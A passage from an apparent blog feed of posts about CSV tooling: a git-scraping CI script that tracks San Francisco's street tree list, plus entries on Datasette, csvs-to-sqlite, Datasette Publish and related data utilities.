git add Street_Tree_List.csv
git config --global user.email &amp;quot;treebot@example.com&amp;quot;
git config --global user.name &amp;quot;Treebot&amp;quot;
sudo pip install csv-diff
csv-diff Street_Tree_List-old.csv Street_Tree_List.csv --key=TreeID &amp;gt; message.txt
git commit -F message.txt &amp;amp;&amp;amp; \
  git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master \
  || true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This script does all of the work.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First it backs up the existing &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; as &lt;code&gt;Street_Tree_List-old.csv&lt;/code&gt;, in order to be able to run a comparison later.&lt;/li&gt;
&lt;li&gt;It downloads the latest copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; from the San Francisco data portal&lt;/li&gt;
&lt;li&gt;It adds the file to the git index and sets itself an identity for use in the commit&lt;/li&gt;
&lt;li&gt;It installs my &lt;code&gt;csv-diff&lt;/code&gt; utility &lt;a href="https://pypi.org/project/csv-diff/"&gt;from PyPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;It uses &lt;code&gt;csv-diff&lt;/code&gt; to create a diff of the two files, and writes that diff to a new file called &lt;code&gt;message.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Finally, it attempts to create a new commit using &lt;code&gt;message.txt&lt;/code&gt; as the commit message, then pushes the result to GitHub&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The last line is the most complex. Circle CI will mark a build as failed if any of the commands in the &lt;code&gt;run&lt;/code&gt; block return a non-0 exit code. &lt;code&gt;git commit&lt;/code&gt; returns a non-0 exit code if you attempt to run it but none of the files have changed.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;git commit ... &amp;amp;&amp;amp; git push ... || true&lt;/code&gt; ensures that if &lt;code&gt;git commit&lt;/code&gt; succeeds the &lt;code&gt;git push&lt;/code&gt; command will be run, BUT if it fails the &lt;code&gt;|| true&lt;/code&gt; will still return a 0 exit code for the overall line - so Circle CI will not mark the build as failed.&lt;/p&gt;
&lt;p&gt;There’s one last trick here: I’m using &lt;code&gt;git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master&lt;/code&gt; to push my changes to GitHub. This takes advantage of Circle CI environment variables, which are &lt;a href="https://circleci.com/docs/2.0/env-vars/"&gt;the recommended way&lt;/a&gt; to configure secrets such that they cannot be viewed by anyone browsing &lt;a href="https://circleci.com/gh/simonw/sf-tree-history"&gt;your Circle CI builds&lt;/a&gt;. I created a &lt;a href="https://help.github.com/en/articles/creating-a-personal-access-token-for-the-command-line"&gt;personal GitHub auth token&lt;/a&gt; for this project, which I’m using to allow Circle CI to push commits to GitHub on my behalf.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Next_steps_78"&gt;&lt;/a&gt;Next steps&lt;/h3&gt;
&lt;p&gt;I’m really excited about this pattern of using GitHub in combination with Circle CI to track changes to any file that is being posted on the internet. I’m opening up the code (and my &lt;a href="https://github.com/simonw/csv-diff"&gt;csv-diff utility&lt;/a&gt;) in the hope that other people will use them to set up their own tracking projects. Who knows, maybe there’s a file out there that’s even more exciting than San Francisco’s official list of trees!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/git"&gt;git&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/san-francisco"&gt;san-francisco&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/git-scraping"&gt;git-scraping&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="data-journalism"/><category term="git"/><category term="projects"/><category term="san-francisco"/><category term="git-scraping"/></entry><entry><title>Datasette 0.23: CSV, SpatiaLite and more</title><link href="https://simonwillison.net/2018/Jun/18/datasette-csv-export/#atom-tag" rel="alternate"/><published>2018-06-18T15:34:04+00:00</published><updated>2018-06-18T15:34:04+00:00</updated><id>https://simonwillison.net/2018/Jun/18/datasette-csv-export/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://datasette.readthedocs.io/en/latest/changelog.html#v0-23"&gt;Datasette 0.23: CSV, SpatiaLite and more&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The big new feature in 0.23 is CSV export: any Datasette table or query can now be exported as CSV, including the option to get all matching rows in one giant CSV file taking advantage of Python 3 async and Datasette’s efficient keyset pagination. Also in this release: improved support for SpatiaLite and various JSON API improvements including the ability to expand foreign key labels in JSON and CSV responses.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/simonw/status/1008733990172282880"&gt;@simonw&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/><category term="datasette"/></entry><entry><title>sqlitebiter</title><link href="https://simonwillison.net/2018/May/17/sqlitebiter/#atom-tag" rel="alternate"/><published>2018-05-17T22:40:28+00:00</published><updated>2018-05-17T22:40:28+00:00</updated><id>https://simonwillison.net/2018/May/17/sqlitebiter/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/thombashi/sqlitebiter"&gt;sqlitebiter&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Similar to my csvs-to-sqlite tool, but sqlitebiter handles “CSV/Excel/HTML/JSON/LTSV/Markdown/SQLite/SSV/TSV/Google-Sheets”. Most interestingly, it works against HTML pages—run “sqlitebiter -v url ’https://en.wikipedia.org/wiki/Comparison_of_firewalls’” and it will scrape that Wikipedia page and create a SQLite table for each of the HTML tables it finds there.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/scraping"&gt;scraping&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="scraping"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>csvs-to-sqlite 0.8</title><link href="https://simonwillison.net/2018/Apr/24/csvs-to-sqlite/#atom-tag" rel="alternate"/><published>2018-04-24T16:11:01+00:00</published><updated>2018-04-24T16:11:01+00:00</updated><id>https://simonwillison.net/2018/Apr/24/csvs-to-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/releases/tag/0.8"&gt;csvs-to-sqlite 0.8&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I released a new version of my csvs-to-sqlite tool this morning with a bunch of handy new features. It can now rename columns and define their types, add the CSV filenames as an additional column, create indexes on columns and parse dates and datetimes into SQLite-friendly ISO formatted values.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/><category term="sqlite"/></entry><entry><title>Parsing CSV using ANTLR and Python 3</title><link href="https://simonwillison.net/2018/Apr/6/python3-antlr-csv/#atom-tag" rel="alternate"/><published>2018-04-06T14:33:58+00:00</published><updated>2018-04-06T14:33:58+00:00</updated><id>https://simonwillison.net/2018/Apr/6/python3-antlr-csv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/jszheng/py3antlr4book/tree/master/08-CSV"&gt;Parsing CSV using ANTLR and Python 3&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I’ve been trying to figure out how to use ANTLR grammars from Python—this is the first example I’ve found that really clicked for me.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/antlr"&gt;antlr&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/parsing"&gt;parsing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;&lt;/p&gt;



</summary><category term="antlr"/><category term="csv"/><category term="parsing"/><category term="python"/></entry><entry><title>django-postgres-copy</title><link href="https://simonwillison.net/2018/Jan/26/django-postgres-copy/#atom-tag" rel="alternate"/><published>2018-01-26T00:43:04+00:00</published><updated>2018-01-26T00:43:04+00:00</updated><id>https://simonwillison.net/2018/Jan/26/django-postgres-copy/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://django-postgres-copy.californiacivicdata.org/en/latest/"&gt;django-postgres-copy&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Really neat Django queryset add-on which exposes the PostgreSQL COPY statement for importing (and exporting) CSV data. MyModel.objects.from_csv(“filename.csv”). Built by the team of data journalists at the California Civic Data Coalition.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://www.californiacivicdata.org/2018/01/25/index-drop-and-copy/"&gt;Cut down database imports by a third using this one weird trick&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="django"/><category term="postgresql"/></entry><entry><title>Datasette Publish: a web app for publishing CSV files as an online database</title><link href="https://simonwillison.net/2018/Jan/17/datasette-publish/#atom-tag" rel="alternate"/><published>2018-01-17T14:11:05+00:00</published><updated>2018-01-17T14:11:05+00:00</updated><id>https://simonwillison.net/2018/Jan/17/datasette-publish/#atom-tag</id><summary type="html">
    &lt;p&gt;I’ve just released &lt;a href="https://publish.datasettes.com/"&gt;Datasette Publish&lt;/a&gt;, a web tool for turning one or more CSV files into an online database with a JSON API.&lt;/p&gt;
&lt;p&gt;Here’s &lt;a href="https://datasette-onrlszntsq.now.sh/"&gt;a demo application I built&lt;/a&gt; using Datasette Publish, showing Californian campaign finance data using CSV files released by the &lt;a href="https://www.californiacivicdata.org/"&gt;California Civic Data Coalition&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And here’s an animated screencast showing exactly how I built it:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2018/datasette-publish-demo.gif" alt="Animated demo of Datasette Publish" style="max-width: 100%" /&gt;&lt;/p&gt;
&lt;p&gt;Datasette Publish combines my &lt;a href="https://github.com/simonw/datasette"&gt;Datasette&lt;/a&gt; tool for publishing SQLite databases as an API with my &lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;csvs-to-sqlite&lt;/a&gt; tool for generating them.&lt;/p&gt;
&lt;p&gt;It’s built on top of the &lt;a href="https://zeit.co/now"&gt;Zeit Now&lt;/a&gt; hosting service, which means anything you deploy with it lives on your own account with Zeit and stays entirely under your control. I used the brand new &lt;a href="https://zeit.co/blog/api-2"&gt;Zeit API 2.0&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Zeit’s generous free plan means you can try the tool out as many times as you like - and if you want to use it for an API powering a production website you can easily upgrade to a &lt;a href="https://zeit.co/pricing"&gt;paid hosting plan&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;a id="Who_should_use_it_16"&gt;&lt;/a&gt;Who should use it&lt;/h2&gt;
&lt;p&gt;Anyone who has data they want to share with the world!&lt;/p&gt;
&lt;p&gt;The fundamental idea behind Datasette is that publishing structured data as both a web interface and a JSON API should be as quick and easy as possible.&lt;/p&gt;
&lt;p&gt;The world is full of interesting data that often ends up trapped in PDF blobs or other hard-to-use formats, if it gets published at all. Datasette encourages using SQLite instead: a powerful, flexible format that enables analysis via SQL queries and can easily be shared and hosted online.&lt;/p&gt;
&lt;p&gt;Since so much of the data that IS published today uses CSV, this first release of Datasette Publish focuses on CSV conversion above anything else. I plan to add support for other useful formats in the future.&lt;/p&gt;
&lt;p&gt;The three areas I’m most excited in seeing adoption of Datasette are data journalism, civic open data and cultural institutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data journalism&lt;/strong&gt; because Datasette is the tool I wish I had had for publishing data back when I worked at the Guardian. When we started &lt;a href="https://www.theguardian.com/data"&gt;the Guardian Datablog&lt;/a&gt; we ended up using Google Sheets for this.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Civic open data&lt;/strong&gt; because it turns out the open data movement mostly won! It’s incredible how much high quality data is published by local and national governments these days. My &lt;a href="https://sf-tree-search.now.sh"&gt;San Francisco tree search&lt;/a&gt; project for example uses data from the Department of Public Works - a &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;CSV of 190,000 trees&lt;/a&gt; around the city.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cultural institutions&lt;/strong&gt; because the museums and libraries of the world are sitting on enormous treasure troves of valuable information, and have an institutional mandate to share that data as widely as possible.&lt;/p&gt;
&lt;p&gt;If you are involved in any of the above please &lt;a href="https://twitter.com/simonw"&gt;get in touch&lt;/a&gt;. I’d love your help improving the Datasette ecosystem to better serve your needs.&lt;/p&gt;
&lt;h2&gt;&lt;a id="How_it_works_36"&gt;&lt;/a&gt;How it works&lt;/h2&gt;
&lt;p&gt;Datasette Publish would not be possible without Zeit Now. Now is a revolutionary approach to hosting: it lets you instantly create immutable deployments with a unique URL, via a command-line tool or using &lt;a href="https://zeit.co/api"&gt;their recently updated API&lt;/a&gt;. It’s by far the most productive hosting environment I’ve ever worked with.&lt;/p&gt;
&lt;p&gt;I built the main Datasette Publish interface using React. Building a SPA here made a lot of sense, because it allowed me to construct the entire application without any form of server-side storage (aside from &lt;a href="https://keen.io/"&gt;Keen&lt;/a&gt; for analytics).&lt;/p&gt;
&lt;p&gt;When you sign in via Zeit OAuth I store your access token in a signed cookie. Each time you upload a CSV the file is stored directly using Zeit’s upload API, and the file metadata is persisted in JavaScript state in the React app. When you click “publish” the accumulated state is sent to the server where it is used to construct a new Zeit deployment.&lt;/p&gt;
&lt;p&gt;The deployment itself consists of the CSV files plus &lt;a href="https://gist.github.com/simonw/365294fb51765fb07bc99fe5eb7fee22"&gt;a Dockerfile&lt;/a&gt; that installs Python, Datasette, csvs-to-sqlite and their dependencies, then runs csvs-to-sqlite against the CSV files and starts up Datasette against the resulting database.&lt;/p&gt;
&lt;p&gt;If you specified a title, description, source or license I generate a Datasette &lt;a href="https://datasette.readthedocs.io/en/latest/metadata.html"&gt;metadata.json&lt;/a&gt; file and include that in the deployment as well.&lt;/p&gt;
&lt;p&gt;Since free deployments to Zeit are “source code visible”, you can see exactly how the resulting application is structured by visiting &lt;a href="https://datasette-onrlszntsq.now.sh/_src"&gt;https://datasette-onrlszntsq.now.sh/_src&lt;/a&gt; (the campaign finance app I built earlier).&lt;/p&gt;
&lt;p&gt;Using the Zeit API in this way has the neat effect that I don’t ever store any user data myself - neither the access token used to access your account nor any of the CSVs that you upload. Uploaded files go straight to your own Zeit account and stay under your control. Access tokens are never persisted. The deployed application lives on your own hosting account, where you can terminate it or upgrade it to a paid plan without any further involvement from the tool I have built.&lt;/p&gt;
&lt;p&gt;Not having to worry about storing encrypted access tokens or covering any hosting costs beyond the Datasette Publish tool itself is delightful.&lt;/p&gt;
&lt;p&gt;This ability to build tools that themselves deploy other tools is fascinating. I can’t wait to see what other kinds of interesting new applications it enables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://news.ycombinator.com/item?id=16170892"&gt;Discussion on Hacker News&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zeit-now"&gt;zeit-now&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="zeit-now"/><category term="datasette"/></entry><entry><title>csvkit</title><link href="https://simonwillison.net/2018/Jan/8/csvkit/#atom-tag" rel="alternate"/><published>2018-01-08T21:03:38+00:00</published><updated>2018-01-08T21:03:38+00:00</updated><id>https://simonwillison.net/2018/Jan/8/csvkit/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://csvkit.readthedocs.io/"&gt;csvkit&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
“A suite of command-line tools for converting to and working with CSV”—includes a huge range of utilities for things like converting Excel and JSON to CSV, grepping, sorting and extracting a subset of columns, combining multiple CSV files together and exporting CSV to a relational database. Worth reading through the tutorial which shows how the different commands can be piped together.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="datasette"/></entry><entry><title>Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette</title><link href="https://simonwillison.net/2018/Jan/8/himalayan-database-visual-foxpro-gui-json-api-datasette/#atom-tag" rel="alternate"/><published>2018-01-08T19:26:49+00:00</published><updated>2018-01-08T19:26:49+00:00</updated><id>https://simonwillison.net/2018/Jan/8/himalayan-database-visual-foxpro-gui-json-api-datasette/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://gist.github.com/atomotic/61542deb5d1e77a5ff842658b75982ef"&gt;Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The Himalayan Database is a compilation of records for all expeditions that have climbed in the Nepalese Himalaya, originally compiled by journalist Elizabeth Hawley over several decades. The database is published as a Visual FoxPro database—here Raffaele Messuti provides step-by-step instructions for extracting the data from the published archive, converting them to CSV using dbfcsv and then converting the CSVs to SQLite using csvs-to-sqlite so you can browse them using Datasette.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/atomotic/status/949975717734883328"&gt;Raffaele Messuti‏&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="datasette"/></entry><entry><title>Big Data Workflow with Pandas and SQLite</title><link href="https://simonwillison.net/2017/Nov/28/big-data-workflow-with-pandas-and-sqlite/#atom-tag" rel="alternate"/><published>2017-11-28T23:02:50+00:00</published><updated>2017-11-28T23:02:50+00:00</updated><id>https://simonwillison.net/2017/Nov/28/big-data-workflow-with-pandas-and-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://plot.ly/python/big-data-analytics-with-pandas-and-sqlite/"&gt;Big Data Workflow with Pandas and SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Handy tutorial on dealing with larger data (in this case a 3.9GB CSV file) by incrementally loading it into pandas and writing it out to SQLite.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/palewire/status/935642068461826049"&gt;Ben Welsh&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pandas"&gt;pandas&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="pandas"/><category term="sqlite"/></entry><entry><title>Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5</title><link href="https://simonwillison.net/2017/Nov/26/tsv/#atom-tag" rel="alternate"/><published>2017-11-26T07:02:15+00:00</published><updated>2017-11-26T07:02:15+00:00</updated><id>https://simonwillison.net/2017/Nov/26/tsv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/commit/957d4f58935487104ebc155da305d00f42005595"&gt;Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thanks to a pull request from Jani Monoses, csvs-to-sqlite can now handle TSV (or any other separator) as well as regular CSVs.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/></entry><entry><title>New in Datasette: filters, foreign keys and search</title><link href="https://simonwillison.net/2017/Nov/25/new-in-datasette/#atom-tag" rel="alternate"/><published>2017-11-25T21:17:47+00:00</published><updated>2017-11-25T21:17:47+00:00</updated><id>https://simonwillison.net/2017/Nov/25/new-in-datasette/#atom-tag</id><summary type="html">
    &lt;p&gt;I’ve released &lt;a href="https://github.com/simonw/datasette"&gt;Datasette 0.13&lt;/a&gt; with a number of exciting new features (&lt;a href="https://simonwillison.net/2017/Nov/13/datasette/"&gt;Datasette previously&lt;/a&gt;).&lt;/p&gt;
&lt;h3&gt;&lt;a id="Filters_4"&gt;&lt;/a&gt;Filters&lt;/h3&gt;
&lt;p&gt;Datasette’s table view supports query-string based filtering. 0.13 introduces a new user interface for constructing those filters. Let’s use it to &lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1"&gt;find every episode where Bob Ross painted clouds and mountains&lt;/a&gt; in season 3 of The Joy of Painting:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/bob-ross.gif" alt="Animation demonstrating the new filter UI" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The resulting querystring looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;?CLOUDS__exact=1&amp;amp;EPISODE__startswith=S03&amp;amp;MOUNTAIN__exact=1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the &lt;code&gt;.json&lt;/code&gt; or &lt;code&gt;.jsono&lt;/code&gt; extension on the same URL returns JSON (in list-of-lists or list-of-objects format), so the new filter UI also acts as a simple API explorer. If you click “View and edit SQL” you will get the generated SQL in an editor, ready for you to further modify it.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Foreign_key_relationships_16"&gt;&lt;/a&gt;Foreign key relationships&lt;/h3&gt;
&lt;p&gt;Datasette now provides special treatment for SQLite foreign key relationships: if it detects a foreign key when displaying a table it will show values in that column as links to the related records - and if the foreign key table has an obvious label column, that label will be displayed in the column as the link label.&lt;/p&gt;
&lt;p&gt;Here’s an example, using San Francisco’s &lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;Mobile Food Facility Permit&lt;/a&gt; dataset… aka food trucks!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/food-trucks/Mobile_Food_Facility_Permit?Status=5"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/food-trucks.png" alt="Food truck table, showing links in the Applicant and FacilityType columns" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And here’s a portion of the corresponding &lt;code&gt;CREATE TABLE&lt;/code&gt; statements showing the foreign key relationships:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE &amp;quot;Mobile_Food_Facility_Permit&amp;quot; (
    &amp;quot;locationid&amp;quot; INTEGER,
    &amp;quot;Applicant&amp;quot; INTEGER,
    &amp;quot;FacilityType&amp;quot; INTEGER,
    &amp;quot;cnn&amp;quot; INTEGER,
    &amp;quot;LocationDescription&amp;quot; TEXT,
    ...,
    FOREIGN KEY (&amp;quot;Applicant&amp;quot;) REFERENCES [Applicant](id),
    FOREIGN KEY (&amp;quot;FacilityType&amp;quot;) REFERENCES [FacilityType](id)
);
CREATE TABLE &amp;quot;Applicant&amp;quot; (
    &amp;quot;id&amp;quot; INTEGER PRIMARY KEY ,
    &amp;quot;value&amp;quot; TEXT
);
CREATE TABLE &amp;quot;FacilityType&amp;quot; (
    &amp;quot;id&amp;quot; INTEGER PRIMARY KEY ,
     &amp;quot;value&amp;quot; TEXT
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you click through to one of the linked records, you’ll see &lt;a href="https://san-francisco.datasettes.com/food-trucks-921342f/Applicant/28"&gt;a page like this&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://san-francisco.datasettes.com/food-trucks/Applicant/28"&gt;&lt;img style="width: 350px; max-width: 100%" src="https://static.simonwillison.net/static/2017/food-trucks-applicant.png" alt="Food truck applicant" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The “Links from other tables” section lists all other tables that reference this row, and links to a filtered query showing the corresponding records.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Using_csvstosqlite_to_build_foreign_key_tables_51"&gt;&lt;/a&gt;Using csvs-to-sqlite to build foreign key tables&lt;/h3&gt;
&lt;p&gt;The latest release of my &lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;csvs-to-sqlite utility&lt;/a&gt; adds a feature which complements Datasette’s foreign key support: you can now tell &lt;code&gt;csvs-to-sqlite&lt;/code&gt; to “extract” a specified set of columns and use them to create additional tables.&lt;/p&gt;
&lt;p&gt;Here’s how to create &lt;a href="https://san-francisco.datasettes.com/food-trucks"&gt;the food-trucks.db database&lt;/a&gt; used in the above examples.&lt;/p&gt;
&lt;p&gt;First step: make sure you have Python 3 installed. On OS X with homebrew you can run &lt;code&gt;brew install python3&lt;/code&gt;, otherwise follow the instructions on &lt;a href="https://www.python.org/"&gt;Python.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ensure you have the most recent releases of csvs-to-sqlite and datasette:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pip3 install csvs-to-sqlite -U
pip3 install datasette -U
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You may need to &lt;code&gt;sudo&lt;/code&gt; these.&lt;/p&gt;
&lt;p&gt;Now export the full CSV file from the &lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;Mobile Food Facility Permit&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://data.sfgov.org/Economy-and-Community/Mobile-Food-Facility-Permit/rqzj-sfat"&gt;&lt;img style="width: 100%" src="https://static.simonwillison.net/static/2017/data-sf-how-to-download.png" alt="How to download CSV from data.sfgov.org" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here’s a sample of that CSV file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ head -n 2 Mobile_Food_Facility_Permit.csv 
locationid,Applicant,FacilityType,cnn,LocationDescription,Address,blocklot,block,lot,permit,Status,FoodItems,X,Y,Latitude,Longitude,Schedule,dayshours,NOISent,Approved,Received,PriorPermit,ExpirationDate,Location
751253,Pipo's Grill,Truck,5688000,FOLSOM ST: 14TH ST to 15TH ST (1800 - 1899),1800 FOLSOM ST,3549083,3549,083,16MFF-0010,REQUESTED,Tacos: Burritos: Hot Dogs: and Hamburgers,6007856.719,2107724.046,37.7678524427181,-122.416104892532,http://bsm.sfdpw.org/PermitsTracker/reports/report.aspx?title=schedule&amp;amp;report=rptSchedule&amp;amp;params=permit=16MFF-0010&amp;amp;ExportPDF=1&amp;amp;Filename=16MFF-0010_schedule.pdf,,,,2016-02-04,0,,&amp;quot;(37.7678524427181, -122.416104892532)&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, run the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;csvs-to-sqlite Mobile_Food_Facility_Permit.csv \
    -c FacilityType \
    -c block \
    -c Status \
    -c Applicant \
    food-trucks.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-c&lt;/code&gt; options are the real magic here: they tell &lt;code&gt;csvs-to-sqlite&lt;/code&gt; to take that column from the CSV file and extract it out into a lookup table.&lt;/p&gt;
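&lt;p&gt;Conceptually, each &lt;code&gt;-c&lt;/code&gt; extraction is equivalent to SQL along these lines (a simplified sketch to show the idea, not the tool’s actual implementation):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- Build a lookup table of the distinct values
CREATE TABLE &amp;quot;Applicant&amp;quot; (&amp;quot;id&amp;quot; INTEGER PRIMARY KEY, &amp;quot;value&amp;quot; TEXT);
INSERT INTO &amp;quot;Applicant&amp;quot; (&amp;quot;value&amp;quot;)
    SELECT DISTINCT &amp;quot;Applicant&amp;quot; FROM [Mobile_Food_Facility_Permit];
-- Replace each text value with the id of its lookup row
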